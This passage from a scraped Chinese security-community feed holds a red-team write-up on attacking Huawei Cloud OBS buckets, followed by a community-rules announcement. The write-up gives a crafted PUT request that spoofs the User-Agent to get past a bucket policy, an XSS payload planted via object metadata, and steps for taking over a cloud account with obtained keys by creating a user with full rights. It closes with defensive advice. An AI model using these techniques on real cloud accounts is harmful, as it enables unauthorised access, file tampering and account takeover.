{\\n \\"Statement\\": [\\n {\\n \\"Sid\\": \\"键值对测试\\",\\n \\"Effect\\": \\"Allow\\",\\n \\"Principal\\": {\\n \\"ID\\": [\\n \\"*\\"\\n ]\\n },\\n \\"Action\\": [\\n \\"GetObject\\",\\n \\"GetObjectVersion\\",\\n \\"GetObjectVersionAcl\\",\\n \\"GetObjectAcl\\",\\n \\"RestoreObject\\"\\n ],\\n \\"Resource\\": [\\n \\"hweiobs/xss.txt\\"\\n ],\\n \\"Condition\\": {\\n \\"StringEquals\\": {\\n \\"UserAgent\\": [\\n \\"hwobs\\"\\n ]\\n }\\n }\\n }\\n ]\\n}
\\n\\n当正常访问的时候状态码为403
\\n\\n构造请求包访问资源即可成功访问
\\n\\nList*
,PUTObject
等访问存储桶,发现对象已可以被遍历
\\n\\n构造请求包测试上传
\\n\\nPUT /xss1.txt HTTP/1.1\\nHost: hweiobs.obs.cn-east-3.myhuaweicloud.com\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\nAccept-Encoding: gzip, deflate\\nConnection: close\\nUpgrade-Insecure-Requests: 1\\nSec-Fetch-Dest: document\\nSec-Fetch-Mode: navigate\\nSec-Fetch-Site: none\\nSec-Fetch-User: ?1\\nPriority: u=1\\nContent-Length: 7\\n\\nhwobs
\\n\\n文件上传成功,查看桶内文件也上传成功
\\n\\n这种风险最大的问题是
\\n\\n1、当上传的文件名称与桶内文件名一致的话,会导致文件内容被直接覆盖。
\\n\\n2、可对桶内上传任意具有风险的文件甚至恶意的应用等。
\\n\\n添加”元数据“
\\n\\n当通过链接访问设置了该元数据的对象时,会直接弹出一个对象下载的对话框,且对象名称会被修改为“testfile.html”。由于xss.txt
中的文件内容为
\\n\\n<script>alert(1)</script>
用户当访问存储对象后,双击文件打开即触发弹窗
\\n\\n华为云的密钥创建后也需保存
\\n\\n华为云厂商提供的工具OBS Browser+
https://support.huaweicloud.com/browsertg-obs/obs_03_1003.html
\\n\\n登录接管存储桶
\\n\\n创建用户,加入linshi
用户组
用户组授权管理,给予用户ECS和OBS的所有权限
\\n\\n使用工具接管华为云平台资源
\\n\\n成功接管云平台
\\n\\n有的情况下只能获取存储桶的权限的原因就是在用户创建密钥的时候用户或者用户组的权限不足。
\\n\\n访问控制:OBS通过访问控制策略来限制对桶的访问权限,包括身份验证、授权策略和网络ACL等。您可以在控制台中管理这些权限并设置访问控制规则,以确保只有经过授权的用户才能够访问桶。
\\n\\n数据加密:OBS支持多种数据加密方式,包括服务端加密、客户端加密和传输加密等,可以有效保护数据的机密性和完整性。您可以在创建桶时启用加密功能,并设置相应的密钥和加密算法。
\\n\\n防篡改:OBS通过MD5校验值和ETag等机制来检测数据是否被篡改,还可以使用防篡改功能来保护对象的完整性。如果检测到数据被篡改,系统会自动拒绝操作并向管理员发送警报。
\\n\\n安全审计:OBS支持对桶和对象的操作进行审计记录,包括访问、上传、下载和删除等操作。您可以通过控制台或API查询审计日志并监控访问情况。
","description":"前言 云厂商对象存储看了好多家了,上一篇文章介绍了天翼云对象存储ZOS,除了利用工具的可玩性,操作性来讲同前面几篇文章提到的对象存储差别不大,最近看了华为云的OBS,发现华为云在攻击利用的思路上相对来说较其它厂商还是有去别的,因为在配置存储对象的时候可操作性太大了。\\n\\n介绍\\n\\nOBS(Object Storage Service)是一种云存储服务,提供海量、安全、高可靠、低成本的数据存储能力。OBS支持HTTP/HTTPS协议的Web服务接口和SDK/API接口,用户可以方便地通过网页控制台或各种OBS工具管理和访问存储在OBS上的数据。\\n\\n产品架构图…","guid":"https://zone.huoxian.cn/d/2920-obs","author":"和","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-07-10T10:17:55.768Z","media":[{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606181-474411-image.png","type":"photo","width":996,"height":470,"blurhash":"LmOqTwo#WDNg~St6oexYxVoej[js"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606194-397824-image.png","type":"photo","width":1215,"height":616,"blurhash":"L9R:KP%Nof~q_4j]ofoft8t7t7WB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606211-211433-image.png","type":"photo","width":1190,"height":775,"blurhash":"LESF;N%N-:~p~Vj[M}ofo#xtnzR+"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606226-386469-image.png","type":"photo","width":1176,"height":146,"blurhash":"LCSF;Lt7%M~q%MM{M{t7_3WBD%fQ"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606252-779170-image.png","type":"photo","width":1076,"height":774,"blurhash":"LFS6Pl%NRj_2?wRkWYIrT2t7Rkog"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606273-94341-image.png","type":"photo","width":1141,"height":495,"blurhash":"LDSPX{?b-;~q-;WCjrad%NM{M{ae"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606285-785715-image.png","type":"photo","width":1082,"height":294,"blurhash":"LJRp2s~qx]?u%gk8Rji~?uR%M{V["},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606304-860865-image.png","type":"photo","width":1192,"height":251,"blurhash":"LBSigS~q%L_4I^s.s:WrXAWBM{WY"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606319-88921-image.png","type":"photo","width":1197,"height":411,"blurhash":"LIQch+$,nm-qIooyW.bF_NoyNGbY"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606348-997303-image.png","type":"photo","width":921,"height":885,"blurhash":"LHSr},x^bc_2_NRjM{RjR5fkR*WB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606363-538930-image.png","type":"photo","width":1216,"height":427,"blurhash":"LAR{uxxIR%_M_2IAV[t7~pjrV@s:"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606373-649271-image.png","type":"photo","width":1185,"height":479,"blurhash":"LCSPU:%Mx[~qx]RPt7xv?baeM{WV"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606412-674344-image.png","type":"photo","width":949,"height":731,"blurhash":"LBSPX{-=xv~q.AM{M{js4=slV@NG"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606423-408982-image.png","type":"photo","width":1196,"height":544,"blurhash":"LCS6GQrd%2~XtSxtj=WBI.x[axR%"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606436-545441-image.png","type":"photo","width":1202,"height":509,"blurhash":"L7Ss50-;Mx~qs:D%V@ae%LRjRPae"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606461-128816-image.png","type":"photo","width":869,"height":261,"blurhash":"LDRyZ}$nea=~-;oLozkC?wVrnOkW"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606475-184272-image.png","type":"photo","width":1197,"height":426,"blurhash":"LNPs#C~qD*-:~Wt7M{of4nIUt6WB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606492-943962-image.png","type":"photo","width":1202,"height":452,"blurhash":"LAS?Ge_4t7~pT2NIt7ob0MNHofn~"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606517-446788-image.png","type":"photo","width":1195,"height":291,"blurhash":"LLPQBF9GD%a$-;M{a#Rk00-pxut7"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606530-567723-image.png","type":"photo","width":1195,"height":62,"blurhash":"LPP@9DxuWBxu~DoLa|M{-pj[ofxb"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606545-651574-image.png","type":"photo","width":1147,"height":716,"blurhash":"LWRC-@0K0K4n%gV@V@f+jaa}WVj@"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606562-711974-image.png","type":"photo","width":1199,"height":576,"blurhash":"LWQ,OCbJM|xu01j[ofay00f6j]WV"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606578-486774-image.png","type":"photo","width":1202,"height":370,"blurhash":"LDSPb3_3~W?bx]ay%2ofxufQD%of"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606604-78529-image.png","type":"photo","width":1201,"height":244,"blurhash":"LER:KPkD%M_N-;V@M{WB?axuRkIU"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606623-644793-image.png","type":"photo","width":1202,"height":145,"blurhash":"LDS?DV~qxu?b?bt7ofoexuRjWBt7"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606648-759717-image.png","type":"photo","width":1196,"height":381,"blurhash":"LVQA2Bxuae%M4moff6ae4nofj[WB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-10/1720606660-587906-image.png","type":"photo","width":951,"height":486,"blurhash":"LYQcr5?HRkoz00RjayWB4TNHofjY"}],"categories":["原创文章","实战攻防","red"],"attachments":null,"extra":null,"language":null},{"title":"火线Zone 24年社区规则升级,共建技术安全生态","url":"https://zone.huoxian.cn/d/2891-zone-24","content":"火线Zone是由火线安全平台打造的安全技术专家聚集和交流的社区,旨在推动数智时代的安全生态。
\\n\\n通过火线Zone内容社区、火线技术沙龙等形式,为技术专家提供最前沿的技术分享和交流。目前,火线Zone社区成员已超过20000人的规模,其中不乏来自腾讯、华为、Gitlab、绿盟、去哪儿等知名企业的CTO、CISO、安全VP、安全技术专家等,通过社群和活动讨论交流安全攻防、黑客溯源、企业安全管理、安全运营、软件应用安全、云计算安全等方向技术话题。
\\n\\n截止目前,火线Zone累计举办公开的技术交流活动27场(点击查看)、技术内容超过2000篇、10余个城市举办线下交流活动,全方位促进社区成员与企业之间的学习、交流与合作,为安全从业者提供全新思路,共同探讨行业未来发展之路。
\\n\\n在这里,我们重视每一位成员的声音!火线Zone现在诚挚邀请您加入我们的数智安全社区,分享自己经验,和大咖共探数智安全未来。
\\n\\n欢迎您向火线Zone投稿,分享您的知识和经验。为了确保您的稿件能够顺利通过审核并发表,请您仔细阅读以下投稿指南:
\\n投稿文章内容方向包括并不仅限于以下方向:
希望你的文章质量满足以下要求:
\\n审核流程说明:
\\n内容奖励要求:
\\n奖励将在每月第一周公示并发放至火线安全平台账户,可在火线安全平台申请提现。
\\nPS:文章通过后请联系“火线小助手”加入火线Zone创作者群,与其他创作者一起思想碰撞!
为了维护原创作者的权益,确保内容的合法传播,特制定以下转载规则。在您希望转载火线Zone社区的文章时,请务必遵守以下指南:
\\n火线Zone已经开启外部粉丝社区群和城市技术社群,大家可在群内进行技术交流,但严禁发表与技术无关的和讨论政治相关内容
\\n
\\n添加“火线小助手”,并发送以下关键字加入社区
\\n并发送“社区群”可以加入火线Zone社区技术群
\\n发送“同城群”可以加入火线Zone城市分群
向WooYun Zone、Drops致敬
\\n\\n:)
\\n\\n","description":"火线Zone是由火线安全平台打造的安全技术专家聚集和交流的社区,旨在推动数智时代的安全生态。 通过火线Zone内容社区、火线技术沙龙等形式,为技术专家提供最前沿的技术分享和交流。目前,火线Zone社区成员已超过20000人的规模,其中不乏来自腾讯、华为、Gitlab、绿盟、去哪儿等知名企业的CTO、CISO、安全VP、安全技术专家等,通过社群和活动讨论交流安全攻防、黑客溯源、企业安全管理、安全运营、软件应用安全、云计算安全等方向技术话题。\\n\\n截止目前,火线Zone累计举办公开的技术交流活动27场(点击查看)、技术内容超过2000篇…","guid":"https://zone.huoxian.cn/d/2891-zone-24","author":"智能安全助手","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-03-11T10:21:51.885Z","media":[{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-03-11/1710152605-174769-image.png","type":"photo","width":200,"height":200},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-03-11/1710152605-174769-image.png","type":"photo","width":200,"height":200}],"categories":["官方公告"],"attachments":null,"extra":null,"language":null}],"readCount":286,"subscriptionCount":43,"analytics":{"feedId":"68945381962291200","updatesPerWeek":1,"subscriptionCount":43,"latestEntryPublishedAt":null,"view":0}}')